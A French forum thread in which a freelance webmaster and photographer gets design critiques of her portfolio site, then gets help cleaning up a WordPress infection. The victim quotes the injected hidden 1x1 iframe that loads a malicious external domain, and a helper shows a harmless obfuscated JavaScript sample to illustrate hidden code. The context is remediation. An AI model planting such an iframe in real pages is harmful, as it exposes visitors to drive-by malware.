Besoin d'avis extérieur sur mon site

27/07/2011 à 12:38

Mystic

Bonjour,

je me suis mise recement a mon propre compte et j'ai developpe mon site "pro"

cependant j'aurais besoin d'avis exterieur de personne qui me connaissent pas IRL parce que mon entourrage est pas tres objectif lol >_<'

voici le lien : http://www.mystic-webpics.com/

Dans l'attente de vos retours,

Photographiquement,
Mystic
27/07/2011 à 12:57

Mystic

Bonjour,

merci pour vos avis

Flambidou pas de soucis je prends note et je "repare" ca des a present
ah vi c'est pas du webdesign que je propose mais du webmastering ;) (moi c'est le code pur et dur)

vincnet37 c'est vrai que je l'ai vu que sur 15/17" du coup je me rend pas compte de la taille de la police ms je note aussi et je regle ca

Photographiquement,
Mystic
27/07/2011 à 13:48

viXen

Concernant mon point de vue je vais commencer par les points négatifs :

# Ton logo est vraiment agréssif sur ta page d'accueil, ça fait pas vraiment site professionnel, mais plutôt site d'un ado gotic ou du style.
# Dans ton album photo, il doit y avoir un beug, car quand ta galerie apparaît, il y a énormément de vide au dessus et en dessous de la photo.
# Je trouve la police en dessous des photos mal adapté, pourquoi mettre ton texte en gras ?
# Quand on est dans ta gallerie, il y a aucun moyen de faire un retour vers ta page d'accueil, ou vers la page précédente.
# Je trouve dommage de devoir fouillé dans ton site pour accès à tes gallerie photos.
# Comme dis plus haut, c'est curieux que tu utilises la troisième personne pour parlé de toi, et ce qui est encore plus curieu, c'est que sur la page "une passion", tu parles de toi à la première personne ?
# En faite si j'ai trouvé ou tu m'étais tes références, mais pas vraiment à l'endroit auquel je m'attendais, j'aurais plutôt vu ça dans CV, ou mieux, sur ta page d'accueil, car les gens veulent voir au premier coup d'oeil les infos qu'ils cherchent.
# Le fait d'avoir le menu en bas, je trouve que ça fait bizarre. :-t
# Dernier point, je viens de voir ça, la partie contact, avec le message avertissant que des fois ça peut être long… ben ça donne pas vraiment envie d'être un mail.

Maintenant les points positifs :

# La taille de la police ne me dérange pas, pourtant j'ai regardé également avec un macbook 13".

Sinon je pense que tu devrais rajouter dans ton pied de page par exemple, tes coordonnées avec ton adresse, ton mail, et ton portable, parce que tu es une entreprise, et donc ça rassurera les gens d'avoir un numéro ou appeler.

Voilà, tout ça n'est que mon point de vue, et certainement pas le meilleur, mais si ça peut t'aider à monter une affaire qui fonctionne, ça peut être utile.
27/07/2011 à 14:02

Mystic

Bonjour,

merci viXen pour ton avis j'en prends note aussi

je pense que je vais tout revoir en appliquant au mieux les divers point de vue

Photographiquement,
Mystic
27/07/2011 à 14:50

viXen

si je peux te donner un conseil inspire toi de ce qu'il y a dejà sur le net. Il y a des personnes sur ce forum qui font ce que toi tu cherche à faire comme travail, donc en visitant leur site, ça pourrait t'aider.
27/07/2011 à 14:51

Mystic

Bonjour,

Dominique_R je suis "connue" sur le net comme Mystic d'ou le choix de rester la dessus, cela ne m'empechera pas d'utiliser mon prenom en plus si besoin.

Je pense egalement que les resultats doivent (devraient) etre la seule raison pour laquelle quelqu'un veut travailler avec nous et non pas parce qu'on s'appelle "Pierre Dupont" ou "Julie Durant". Cela reste mon point de vue.

Photographiquement,
Mystic

[Edit]
Pardon viXen j'avais pas vu ton message. Je sais mais j'aimerai ne pas trop m'en inspirer pour pas que ca semble etre un "simple copier/coller ou on aurait changer 2/3 trucs". J'ai une idee mais malheureusement elle n'est pas realisable sans utiliser le flash ("langage" que je souhaite banir totalement pour diverses raison technique)
[/Edit]
27/07/2011 à 14:53

viXen

Mystic a écrit :

Bonjour,

Dominique_R je suis "connue" sur le net comme Mystic d'ou le choix de rester la dessus, cela ne m'empechera pas d'utiliser mon prenom en plus si besoin.

Je pense egalement que les resultats doivent (devraient) etre la seule raison pour laquelle quelqu'un veut travailler avec nous et non pas parce qu'on s'appelle "Pierre Dupont" ou "Julie Durant". Cela reste mon point de vue.

Photographiquement,
Mystic

Je suis d'accord avec toi, mais il y a tellement d'arnaque sur le net maintenant, que les gens ne feront pas confiance à un pseudo. Et dis toi que les gens qui te connaissent sur le net, ne te feront pas forcément vivre à la fin du moi. Il ne faut pas exclure les autres personnes qui seraient succeptible de venir te voir pour tel ou tel service. ;)
27/07/2011 à 15:02

Mystic

Pardon viXen j'ai fait un edit de mon precedent message pour "reponse" au tiens qui a du etre envoye en mm tmp que le mien.

viXen & Flambidou : je parle pas de me connaitre QUE sur le net, IRL aussi on me connait plus sous le nom Mystic que sous mon vrai prenom. Flambidou je n'arrive pas a comprendre comme le "serieux" peut dependre d'un simple nom.
Dans ce cas je pense aussi que vu tou(te)s les prejuges/discriminations qu'il y a dans notre monde actuel un "Jean Francois Dupont" serait pris plus au serieux qu'un "Mamadou DMango" hors peut etre que "Mamadou" aura plus d'experience et de "serieux" que "Jean Francois".

Photographiquement,
Mystic
27/07/2011 à 15:16

Mystic

pas de soucis Flambidou. Pour ce qui est de mes devis/factures je les ferais au nom de ma boite "Mystic WebPics".

Photographiquement,
Mystic
27/07/2011 à 15:21

Mystic

Oui :)
Je suis deja en train de mettre en application les divers avis que vous avez pu me donner. Je reviendrai vers voir sous peu je pense :)

Photographiquement,
Mystic
08/08/2011 à 09:25

Mystic

Bonjour,

j'ai fait des modifications sur mon site assez "grosses"

pourriez vous me dire ce que vous en pensez ? (lien dans le premier message)

Photographiquement,
Mystic
02/09/2011 à 10:05

Mystic

Bonjour,

un petit up suite a de grosses modifications sur le site 
j'aimerai vos retours/conseils svp

Photographiquement,
Mystic
02/09/2011 à 10:59

Driz

Ca me parais cruellement blanc comme page d'accueil. Les icones du dock ne me semblent pas s'accorder. Je suis moi même plutot codeur que designer, mais il faut être honnete, quand on fait du web, l'esthetique compte beaucoup. Un peu de css sur le formulaire de contact par exemple.
Bon courage.

[EDIT : dans la partie site les icones affiche un titre en rouge (en rouge ? ! ?) par dessus le titre principal de la page…pas terible ]
02/09/2011 à 11:03

Driz

Arf. Entre ouioui et moi, pas beaucoup de compliment.
Directeur informatique où ça ? Dans quel domaine ? Je vais bientôt chercher un stage :p
02/09/2011 à 11:10

Mystic

ouioui je note pour la police et modifie ca de suite

Driz "Les icones du dock ne me semblent pas s'accorder." 
je comprends pas pourriez vous m'expliquer stp
pour le rouge pardon un ctrl+z de trop et le style de l'ancienne version est revenu je l'ai change 

vincnet37 qu'est ce qui vous semblerez "pro" ?
non le site etant recent a part sur ce forum et des proches personnes ne l'a encore
02/09/2011 à 11:21

Karine

Mystic, je te conseille de regarder d'autres sites internet de professionnels dans le même domaine. C'est vrai que ton site manque de professionalisme, c'est difficile à exprimer pourquoi.
Essaie de faire ça "simple", avec une police plus lisible (pas d'italique), des icones moins grosses et plus lisibles aussi.

Lorsqu'on arrive sur un site, on aime bien avoir l'information le plus rapidement possible. Donc déjà, ta première page est en trop. Ensuite, quel est le lien entre ton blog et la création de sites ? Pas grand chose. De ce que je vois, c'est plus branché "photos". Donc cela doit être en lien direct avec ton site "photos".
Il faut que tu réfléchisses un peu plus à ton projet, parce que là ça fait un peu brouillon. Une icone pour facebook au même niveau que tes sites internet n'est pas non plus à mon avis conseillé…
Je verrai plus un site simple, avec une charte graphique (là il n'y a aucune cohérence dans le graphisme, d'ailleurs, il n'y a pas de recherche graphique). Il faut mettre plus en avant tes références aussi (partenaires ou références ? ce n'est pas la même chose).

Bon courage.
02/09/2011 à 11:32

Meuble

ouiouiphoto a écrit :

Il y a plein de logiciels qui te permettrons de faire un site avec un look plus professionnel et a mon avis plus rapidement

Tu aurais des exemples ^^ ?
Pour le site, no comment : du boulot, je ne vois qu'une page blanche avec un titre en gros et une icône qui renvoie sur un formulaire… Mais je suppose que le réseau bloque pas mal de trucs !
02/09/2011 à 11:51

Driz

ouiouiphoto a écrit :

[quote="Meuble"]Tu aurais des exemples ^^ ?

Dreamweaver
Wordpress
joomla

et sûrement plein d'autres

[/quote]
+1 sur le fait d'utiliser des cms (Système de gestion de contenu) tout fait. Ca demande du travail mais le resultat sera plus "pro".
02/09/2011 à 11:54

Mystic

vincnet37 "La page d accueil fait cheap"
je suis desolee mais je comprends pas le terme cheap  :*) 

ouiouiphoto je code directement oui
j'ai essaye quelques logiciels dans le passe pour faire des sites et j'ai pas du tout accroche

Karine je pensais que faire une page redirigeant vers tel ou tel "sous site" selon le desire de la personne serait mieux que d'en imposer le choix… visiblement j'ai encore eu tord
pour ce qui est du blog je vais le mettre directement sur le site photo en effet etant plus oriente photo que web c'est plus judicieux

Dominique_R merki je prends note et je vais modifier tout ca 

ouiouiphoto ne pas confondre logiciels et plateforme… dreamweaver est ce que j'ai deja essaye et est un LOGICIEL, le reste wrodpress, joomla, zend et j'en passe sont des PLATEFORMES type blog a la base
02/09/2011 à 12:00

Karine

euh enfin tord, je dis juste mon avis hein, je me suis moi-même longtemps posé la question, faisait aussi des sites web et de la photo. J'ai fait deux sites distincts, avec juste un lien. Je ne sais pas si c'est la bonne solution non plus mais ça me parait plus clair comme ça.

Pour le codage, le CMS est une bonne solution pour des sites complexes dynamiques (avec interface d'administration), mais pour ici on parle juste de graphisme finalement, c'est l'apparence du site. Et c'est plus simple de créer une feuille de style CSS en entier pour un site "vitrine" de quelques pages, que de s'ennuyer avec une usine à gaz telle que Joomla en modifiant le CSS de templates destinés à des sites plus complexes.

02/09/2011 à 12:05

Mystic

Karine j'ai pas tt a fait compris pour vos 2 sites 
je suis d'accord sur l'utilisation d'un CMS pour qq chose de bien plus complexe que mes "sites" vitrines
02/09/2011 à 12:13

Karine

Pour te donner un exemple, j'ai mon site lumieres-naturelles.fr pour les photos, et krea-id.fr pour les sites internet.
Dans le site lumieres naturelles, j'ai juste un lien vers mon site de créations de sites dans la partie "liens", et dans le site de création de sites, j'ai mis un onglet "photographies" mais seulement pour les prestations photographiques (qui peuvent être un complément dans la réalisation de sites), avec un lien vers mon site de photos "lumières naturelles" (site que je suis en train de refaire car je ne l'aime plus comme il est !)
Le "blog" sera dans le "nouveau" site lumieres naturelles.

Voilà, je ne sais pas si c'est ce qu'il faut faire, mais c'est un exemple de ce qui peut se faire pour distinguer les deux activités. Si ça peut t'aider.
02/09/2011 à 12:18

Mystic

Karine merci j'ai compris ce que vous vouliez dire :) ms cela "impose" a la personne de passer par l'un ou par l'autre pr y acceder 
j'avais ca au debut et j'ai modifie pour faire la premiere page afin de laisser le choix au gens d'aller ds la partie qu'ils souhaitent
je vais essayer d'adapter votre "systeme" avec le "mien"
02/09/2011 à 12:27

Karine

Vous n'êtes pas obligés de suivre le même chemin (je vouvoie puisque vous vouvoyez :P), c'est juste un exemple, en espérant aider un peu.

Vincent : merci :*)
02/09/2011 à 12:34

Mystic

Karine pardon c'est l'habitude de vouvoyez  :*)
merci pour l'exemple en tout cas :)
02/09/2011 à 12:42

Karine

Dominique_R a écrit :

Joli site, en effet. Il fait pro. Je n'y ai relevé que quelques broutilles qui échapperont à la plupart des gens, je pense… ;)

Oh, tu peux me dire ? Sinon par MP, vu que ce n'est pas le sujet de ce post. Ca m'intéresse. C'est vrai que j'ai jamais eu le courage comme Mystic de proposer mon site à la critique en ouvrant un post… c'est pas facile comme exercice. Mais j'aime tellement pas me "vendre", que finalement, c'est pas mon site qui m'a apporté les quelques clients que j'ai pu avoir, mais le bouche à oreille (surtout dans le coin paumé ou je vis). C'est quand même important car ça reste une "vitrine" de ce qu'on est capable de faire.
02/09/2011 à 13:12

Mystic

ouiouiphoto je prefere largement des remarques construites comme vous pouvez tous le faire ici, ce qui me permet d'evoluer plutot que des remarques du genre "on dirait du word c'est naze" qu'on a deja pu me sortir en rapport avec ce site (non c'etait pas sur PixPo' pas la peine de chercher)

je pense que je ne sais pas exactement ce qu'est un site "pro" a proprement dit, si vous avez des exemples je suis prenneuse, pas pour copier ms pour comprendre 
02/09/2011 à 13:30

Mystic

ouiouiphoto merci pour ses pistes que je vais exploiter des maintenant

vincnet37 developpeur web oui, photographe de metier non j'ai commence a shooter il y a plus d'un an mnt et je me considere pas pro loin de la (mm si je suis fiere de certains de mes cliches ms ca c'est autres choses) mais je me suis declaree en seconde activite si on me propose d'en faire un "metier"

la plupart des modifications qu'on m'a suggere ont ete faites, j'espere n'en avoir oubliee aucunes ><'
11/09/2011 à 19:39

TiZef

tout d'abord, ne pas mal prendre ce que je vais dire, ce sont des questions que je me pose à la lecture de ta démarche et à la découverte de ton site.

Tu proposes de mettre tes compétences au service de celui ou celle qui voudrait créer un site, mieux, à son image. Et pourtant, tu cherches à savoir comment créer ton propre site qui lui propose de créer d'autres sites… ? … Comme si je me proposais de réparer une bagnole et d'aller demander à un mécano comment on fait… ? …

Le site fait en effet très amateur, je pense que tu as pris le problème à l'envers. Fais toi un cahier des charges. Je veux quoi comme fonctionnalités ? Quelles infos je veux mettre en avant ? Comment ? Quelle charte graphique ? Quel language ? mon référencement ? Tu vas à la pêche aux infos, tu vois comment ce font les sites pros, tu prends ce qui te plaît, rejette ce qui ne te plais pas etc… C'est seulement une fois tout cela établi que tu te lances dans le développement. Et c'est grâce à ce cahier des charges que tu sauras où tu en es exactement.

Je serais toi, j'efface tout et je recommence. Pense aussi à rédiger un cahier de tests, le nez dans le guidon c'est un coup à zapper des bugs.

Bon courage ;)
12/09/2011 à 14:49

Mystic

TiZef je cherche a savoir ce que les gens pensent de mon site et non comment faire des sites
pourquoi fait il "tres amateur" ?
12/09/2011 à 16:51

Mystic

ouiouiphoto merci pour ces nouveaux conseils je vais tacher de me pencher sur une chartre graphique plus uniforme
cependant je souhaiterai savoir si d'apres vous il serait mieux de faire une chartre pour le site "web" et une autre pour le site "photo" ou bien si il est mieux d'en faire un seul et unique que j'adapterai aux deux sites ?

Flambidou merci pour le lien et pour le commentaire sur mon site
je vais faire en sorte que ca rentre sur une page en petite resolution (ce qui etait le cas sur mon 15" pourtant mais n'ayant qu'un seul pc je n'ai pas pu tester autrement)
pour la police en fait celle du menu et celle du pied de page sont la meme a la difference qu'en bas c'est plus petit et en italique ><' mais je vais essayer une autre police
12/09/2011 à 18:46

TiZef

ah tu veux savoir ce que l'on pense, ou, ce que je pense de ton site, puisque tu nous le soumet ?

Ben, je vais être franc et direct, je cherche à faire un site, je tombe sur le tiens, je fais demi-tour. Pourquoi fait-il amateur ? :

Les icônes animés
Les polices
Lier la créations web et la photo, mais ça on te l'a déjà dis.
Lorsque je vois les créations, notamment CGTV, l'horloge animation espace, le logo, le fond de page, le bouton pour entrer dans le site,  tout absolument tout fait amateur, dans le sens que ça fait site fait par quelqu'un qui a certes de l'attirance pour le domaine, mais pas de compétences particulières.
Le pseudo, mais là aussi on te l'a déjà dit

Je vais être encore plus franc, j'ai du mal à faire une relation entre ton CV et tes réalisations.

J'imagine très bien que mon message ne te fera pas plaisir, quitte à passer pour un gros con, mais j'assume, je préfère être franc. Pour autant je n'ai rien contre toi hein ;)
13/09/2011 à 09:41

Mystic

TiZef les icones animes ? c'est a dire ? pourquoi cela fait il amateur ? pour la police elle est des plus "basique" puisque c'est du "Verdana"
pourquoi lier le web a la photo ? c'est deux domaine different (un coup on me dit de les lier un coup on me dit de pas les lier… je m'y perd ><')
pour le site de la CGTV comme je l'ai dit sur mon site je n'ai fait QUE "Réalisation d'un module de vote pour une émission
Aide à la réalisation de divers module
 " je N'ai PAS cree le site
le CV c'etait pour les competences mais je vais refaire le contenu de cette page apres avoir fini ma galerie photo
27/06/2012 à 17:02

Mystic

Bonjour,

je reviens vers vous car j'ai refais mon site et j'aimerai avoir vos avis dessus ?
voici le lien du site : http ://www.mystic-webpics.fr

j'ai créé une galerie extérieure au site pour y mettre toutes mes photos (au lieu de passer par FB) 
pourrais je avois un avis aussi sur la galerie ?
voici le lien de la galerie : http ://galerie.mystic-webpics.fr

je suis en train de me demander si je dois la refaire ou juste faire quelques mise a jour sur ma galerie actuelle

Cordialement,
Mystic
27/06/2012 à 18:19

samphoto

Bonjour, 
Ma curiosité m'a poussé à  ouvrir votre lien mais sous safari il y a 5mn le site apparaissait comme indésirable…
Bug ?
A bientôt
27/06/2012 à 21:48

Mystic

@ouiouiphoto, @samphoto
je viens de rentrer et de voir vos message, j'ai meme recu un mail de mon hebergeur, il semblerait que quelqu'un à réussi à injecter un iframe mais je le trouve pas je suis en train de passer au crible le site et ses pages en esperant le trouver rapidement.

Mystic

edit :
le site a l'air a nouveau accessible
27/06/2012 à 23:49

Meuble

[quote=Mystic]edit :
le site a l'air a nouveau accessible[/quote]
Hé bah non (désolé, j'y suis pour rien ^^'). Message obtenu (sous chrome) :
"Avertissement : Un problème a été détecté sur cette page.
www.mystic-webpics.fr contient un logiciel malveillant. Votre ordinateur pourrait être infecté par un virus si vous consultez ce site."
28/06/2012 à 10:58

Mystic

Meuble a écrit :

[quote="Mystic"]edit :
le site a l'air a nouveau accessible

Hé bah non (désolé, j'y suis pour rien ^^'). Message obtenu (sous chrome) :
"Avertissement : Un problème a été détecté sur cette page.
www.mystic-webpics.fr contient un logiciel malveillant. Votre ordinateur pourrait être infecté par un virus si vous consultez ce site."[/quote]
ra mais ca m'enerve pourquoi de chez moi j'ai pas de message ? !
bon on va faire un menache de fond et on va voir, je reviendrai que j'aurais trouvé ce fichu malware gr
28/06/2012 à 13:46

Kylian

Tu n'as pas le message car tu entres l'adresse directement dans la barre d'adresse de ton naviagteur.
Le message s'affiche lorsque tu utilises la recherche via Google ou lorsque tu passes par le navigateur Chrome.

Une fois que tu as trouvé, utilise les outils d'administration Google pour réévaluer ton site.
Sinon il va resté en "potentiellement dangereux"…

C'est quand même con, tu viens de refaire le site, et il est déjà infecté… Ils sont rapides ces bougres :P

Il est développpé en quel langage ?

28/06/2012 à 13:50

Mystic

Kylian a écrit :

Tu n'as pas le message car tu entres l'adresse directement dans la barre d'adresse de ton naviagteur.
Le message s'affiche lorsque tu utilises la recherche via Google ou lorsque tu passes par le navigateur Chrome.

Mon frere n'utilises pas chrome et à du cliquer sur l'un de mes liens et il m'a aussi fait un mail pour me le dire

Kylian a écrit :

Une fois que tu as trouvé, utilise les outils d'administration Google pour réévaluer ton site.
Sinon il va resté en "potentiellement dangereux"…

Bah la j'utilise l'outil de google pour voir ou c'est mais je trouve pas malgré les recherches dans les fichiers ><"

Kylian a écrit :

Il est développpé en quel langage ?

j'utilise la plateforme Wordpress pour la base de mon site donc c'est un CMS en PHP
28/06/2012 à 14:01

Kylian

Verifies que ton Wordpress est bien à jour, que tu as bien supprimé tous les dossiers d'installation, et change le mot de passe de ta base de données (si tu y as accès).
Normalement, l'iframe malveillante devrait se trouver quelque part dans ta base de données (accessible via phpMyAdmin chez OVH), épluche-la et essaie de retrouver les sites dont parle Google dans son rapport.
Le code malveillant peut être aussi "caché", grâce par exemple à du javascript obfusqué, ça ressemble à ça : 

var _0x2f0a=["\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21","\x0A"];var a=_0x2f0a[0];function MsgBox(_0xd99ex3){alert(_0xd99ex3+_0x2f0a[1]+a);} ;

Tout se qui se trouve dans ta base de données (sous Wordpress) devrait être lisible par un humain, si tu as du code comme ça dans un des champs, c'est suspect…
28/06/2012 à 14:07

Mystic

Kylian a écrit :

Verifies que ton Wordpress est bien à jour, que tu as bien supprimé tous les dossiers d'installation, et change le mot de passe de ta base de données (si tu y as accès).
Normalement, l'iframe malveillante devrait se trouver quelque part dans ta base de données, épluche-la et essaie de retrouver les sites dont parle Google dans son rapport.
Le code malveillant peut être aussi "caché", grâce par exemple à du javascript obfusqué, ça ressemble à ça : 

var _0x2f0a=["\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21","\x0A"];var a=_0x2f0a[0];function MsgBox(_0xd99ex3){alert(_0xd99ex3+_0x2f0a[1]+a);} ;

Tout se qui se trouve dans ta base de données (sous Wordpress) devrait être lisible par un humain, si tu as du code comme ça dans un des champs, c'est suspect…

La MAJ vient d'être faite, j'ai changé mes mdp (ftp, manager OVH, pma)

j'ai vu son rapport et j'épluche les fichiers, je vais m'attaquer a la bdd mnt 
le code malsaint c'est ca < iframe src= " http ://directmarketing22promptmarketing.in/in.c
gi ? 55764 " width="1" height="1" frameborder="0" >
du coup je fais une recherche sur 'iframe' mais je trouve rien de chelou… 

ra ca m'enerve ><"
28/06/2012 à 14:10

Kylian

C'est peu probable que ce soit dans les fichiers que ça se trouve…
C'est surement dans la bdd, et il y a des chances que ce soit obfusqué, ta recherche sur iframe ne va surement rien donner…

EDIT : Arf, je voulais cherche le code obfusqué sur la page, mais t'as changé le mdp de la bdd sans modifier celui de Wordpress :D
La pluplart du temps, ce sont des failles dans wordpress qui permettent l'ajout de code malveillant, la mise à jour devrait régler le problème, maintenant, y'a plus qu'à retrouver le code :P
28/06/2012 à 14:14

Mystic

Kylian a écrit :

C'est peu probable que ce soit dans les fichiers que ça se trouve…
C'est surement dans la bdd, et il y a des chances que ce soit obfusqué, ta recherche sur iframe ne va surement rien donner…

sait on jms au moins mnt je suis sur que ca me l'ai pas ><" apres une matinee a faire la recherche partout et faire la MAJ.

Je vais voir ds la bdd, d'apres vous je devrez rechercher sur quel terme ? iframe peut etre ?
28/06/2012 à 14:19

Kylian

Je pense que tu devrais rétablir l'acces au site, que je puisse y jeter un oeil et essayer de trouver le code obfusqué :D
Si la recherche sur iframe ou sur directmarketing ne donne rien, faudrait éplucher à la main la bdd pour voir où se trouve le code suspect.
Sinon, il reste la solution de sauvegarder tes articles/images et réinstaller wordpress (en effacant la bdd).

28/06/2012 à 14:23

Mystic

Kylian a écrit :

Je pense que tu devrais rétablir l'acces au site, que je puisse jeter un oeil et essayer de trouver le code obfusqué…
Si la recherche sur iframe ou sur directmarketing ne donne rien, faudrait éplucher à la main la bdd pour voir où se trouve du code suspect.
Sinon, il reste la solution de sauvegarder tes articles/images et réinstaller wordpress (en effacant la bdd).

j'ai fait la demande a google pour le remettre en ligne mnt faut attendre
je vais faire une comparaision avec mes backup de bdd 
reste à trouver la date ou ca a commence pour pas remettre une bdd pourrie
28/06/2012 à 14:25

Kylian

Demande pas à Google tant que tu n'as pas viré la bête, ils vont refuser…
Ce que je disais, c'était reconfigurer ton wordpress avec le bon mdp de la bdd.

Pour les backups, je sais pas, la mise à jour de Wordpress va peut être géner un peu.
28/06/2012 à 14:28

Mystic

Kylian a écrit :

Demande pas à Google tant que tu n'as pas viré la bête, ils vont refuser…
Ce que je disais, c'était reconfigurer ton wordpress avec le bon mdp de la bdd.

Pour les backups, je sais pas, la mise à jour de Wordpress va peut être géner un peu.

j'ai remis le bon mdp il est accessible au dela du malware
j'ai demande les log à mon hebergeur… reste a lire les millers de ligne ><"
28/06/2012 à 14:36

Kylian

Pas sûr que les logs te servent à quelque chose…
Tu sais quelle est la page infectée ou pas ? (dans le rapport Google)
28/06/2012 à 14:44

Mystic

Kylian a écrit :

Pas sûr que les logs te servent à quelque chose…
Tu sais quelle est la page infectée ou pas ? (dans le rapport Google)

Voila ce que me dit le rapport :
/
/tag/tarif/
/DDM/notre-actualitelancement-du-site/ ? utm_source=rss&utm_medium=rss&utm_campaign=notre-actualitelancement-du-site 
/DDM/ 

"/DDM/notre-actualitelancement-du-site/ ? utm_source=rss&utm_medium=rss&utm_campaign=notre-actualitelancement-du-site 
/DDM/"
c'est deux la c'est un groupe d'etudiant qui taf dans ce sous domaine
28/06/2012 à 14:47

Kylian

Déjà, le "/" et "/tag/tarif" ça veut dire qu'il y a de grande chance que ce soit que sur un article ayant le tag tarif, regarde déjà de ce côté là :P
Je vais voir, maintenant que le site marche, je vais faire un petit tour.
28/06/2012 à 14:48

Mystic

Kylian a écrit :

Déjà, le "/" et "/tag/tarif" ça veut dire qu'il y a de grande chance que ce soit que sur un article ayant le tag tarif, regarde déjà de ce côté là :P
Je vais voir, maintenant que le site marche, je vais faire un petit tour.

je regarde ca de suite :)

Merci pour votre aide en tout cas :)  :-*
29/06/2012 à 11:48

Mystic

Bon j'ai refait mon site en local, je vais le remettre sur mon server, nettoyer la base avec la base que j'ai, et croiser les doigts pr que ca marche bien cette fois

Kylian as tu reussi a regarder hier ?
25/07/2012 à 16:02

Mystic

Bonjour,

mon site est a nouveau accessible pour tout le monde depuis 2semaines et demie, la menace ayant ete supprimee.

J'attends a present vos precieux retours.

Mystic
25/07/2012 à 16:28

tiz31

salut mystic, je viens d aller sur ton site et je suis désolé de te dire ca mais j y suis resté 2 minutes pour plusieurs raisons :

-la page d acceuil est vraiment vide pour un site de webmaster et de photos deja ca donne pas envi d aller plus loin
-ensuite j ai regardé ta gallerie, j ai commencé par les photos de nuit et là grosse deception, pas une seule nette, tu as fais des essai de bougé avec la tour eiffel et ca le fais vraiment pas, ensuite j ai regardé les photos de spectacles et je trouve ca assez moyen aussi. Il faut que tu mette que des photos nickel sinon les gens vont penser que t es une amatrice qui essai de faire des photos a ses heures perdues
-j accroche pas sur ton systeme d icones, il a fallu que je cherche pour trouver ton menu deroulant

Ceci n est que mon avis personnel il y a surement des gens qui vont trouver ton site sympa, bonne continuation
25/07/2012 à 17:01

Mystic

tiz31 a écrit :

salut mystic, je viens d aller sur ton site et je suis désolé de te dire ca mais j y suis resté 2 minutes pour plusieurs raisons :

-la page d acceuil est vraiment vide pour un site de webmaster et de photos deja ca donne pas envi d aller plus loin
-ensuite j ai regardé ta gallerie, j ai commencé par les photos de nuit et là grosse deception, pas une seule nette, tu as fais des essai de bougé avec la tour eiffel et ca le fais vraiment pas, ensuite j ai regardé les photos de spectacles et je trouve ca assez moyen aussi. Il faut que tu mette que des photos nickel sinon les gens vont penser que t es une amatrice qui essai de faire des photos a ses heures perdues
-j accroche pas sur ton systeme d icones, il a fallu que je cherche pour trouver ton menu deroulant

Ceci n est que mon avis personnel il y a surement des gens qui vont trouver ton site sympa, bonne continuation

Bonjour,

tout d'abord merci pour votre retour.

J'ai beau le lire et relire j'ai l'impression que vous êtes sur mon ancienne version de site.

Sur quelle URL avez vous été ? que je sache par ou ça pointe pas correctement ?

Cordialement,
Mystic
25/07/2012 à 17:01

tiz31

bon je reviens car j etais en mode mobile, donc j ai regardé ton site en mode non mobile  :D, bon c est un peu mieux au niveau de la page d acceuil et des icones, par contre j ai voulu regarder de nouveau ta gallerie mais ca affiche les photos en grisé  :-t, je trouve que le nom est trop gros et la police me fais penser plus a un site d art martiaux que de photo, le blanc de la page d acceuil me derange j aurai vu plutot une page d acceuil avec une couleur uni, le rectangle a gauche  avec les liens vers fb, twitter et les flux rss attire trop l oeil.
Ensuite au niveau de la partie tarif les signes + c est pas top il aurait mieux valu des petit traits ou des points à mon avis. Dans ta presentation tu parles de toi à la 3 eme personne, ca fait vraiment autain rien que pour ca je ne contacterai pas.
Dernier point la section blog ! Je crois qu en regardant le blog c est definitivement sur que je ne te contacterai pas, "les dix phrases a ne pas dire a un photographe" si pour toi c est de la rigolade, le client lui va se sentir visé car c est justement ca qu il va te poser comme questions ! La partie où tu dis ce que tu prepare avec tes autres clients je ne pense pas que ce soit une bonne idée et pour finir tu mets des photos, pourquoi ne pas les mettres directement dans ta gallerie ?

Désolé si je t ai vexé mais je te dis juste mon ressenti
25/07/2012 à 17:09

Karine

Bonjour Mystic,

Ca fait pas mal de temps que je ne suis plus retournée sur ton site. J'ai vu l'évolution par rapport à ce que tu avais fait au début, et en toute sincérité, je ne peux que te féliciter du changement. Le menu est clair. Le seul petit truc c'est la phrase entre parenthèse (et développeur web à ses heures perdues).

Si tu proposes tes sites web, c'est pas à tes heures perdues. C'est du vrai boulot, avec des vrais clients. Donc, il faut assumer ! Du coup, en titre je mettrai simplement "Mystic WebPics - Photographe et webmaster" ou un truc comme ça. Comme tu mets dans ton menu les deux disciplines au même niveau, il est logique que tu les présentes aussi au même niveau dans le titre.

Est-ce que ça te plait plus à toi cette nouvelle présentation par rapport à la première ? Vois-tu la différence ?
Pour ce qui est des gouts, c'est vrai que c'est un peu sombre/contrasté pour moi et la police du titre ne me plait pas trop. Mais comme le site doit représenter pour tes clients ce que tu es capables de faire et comme c'est ta vitrine, il faut que ça reste un site qui corresponde à ce que tu ferai à un client sans avis extérieur.
25/07/2012 à 17:33

Mystic

tiz31 a écrit :

bon je reviens car j etais en mode mobile, donc j ai regardé ton site en mode non mobile  :D, bon c est un peu mieux au niveau de la page d acceuil et des icones, par contre j ai voulu regarder de nouveau ta gallerie mais ca affiche les photos en grisé  :-t, je trouve que le nom est trop gros et la police me fais penser plus a un site d art martiaux que de photo, le blanc de la page d acceuil me derange j aurai vu plutot une page d acceuil avec une couleur uni, le rectangle a gauche  avec les liens vers fb, twitter et les flux rss attire trop l oeil.
Ensuite au niveau de la partie tarif les signes + c est pas top il aurait mieux valu des petit traits ou des points à mon avis. Dans ta presentation tu parles de toi à la 3 eme personne, ca fait vraiment autain rien que pour ca je ne contacterai pas.
Dernier point la section blog ! Je crois qu en regardant le blog c est definitivement sur que je ne te contacterai pas, "les dix phrases a ne pas dire a un photographe" si pour toi c est de la rigolade, le client lui va se sentir visé car c est justement ca qu il va te poser comme questions ! La partie où tu dis ce que tu prepare avec tes autres clients je ne pense pas que ce soit une bonne idée et pour finir tu mets des photos, pourquoi ne pas les mettres directement dans ta gallerie ?

Désolé si je t ai vexé mais je te dis juste mon ressenti

Version mobile ? euhhh faut que je regarde ca je savais pas que j'en avais une differente à celle pour les PC.

De quels icônes parlez vous ? je n'en ai pas mis sur mon site (où alors je deviens folle ><")

Pour les photos elles s'affichent au scroll ou du moins au mouvement de la page ce qui permet de pas avoir un site trop lourd a cause du chargement des photos au chargement.

Le rectangle à gauche est une de mes futures modifications (quelques modif' sont encore en cours)

(les + ont été modifié)

La présentation a été écrite par une autre personne et non pas par moi, d'où l'utilisation de la 3ème personne, je vais tâcher de le modifier.

pour la partie blog je vais surêment l'externaliser (l'article "les 10 phrases a ne pas dire a un photographe" à été mis en non accessible à présent)

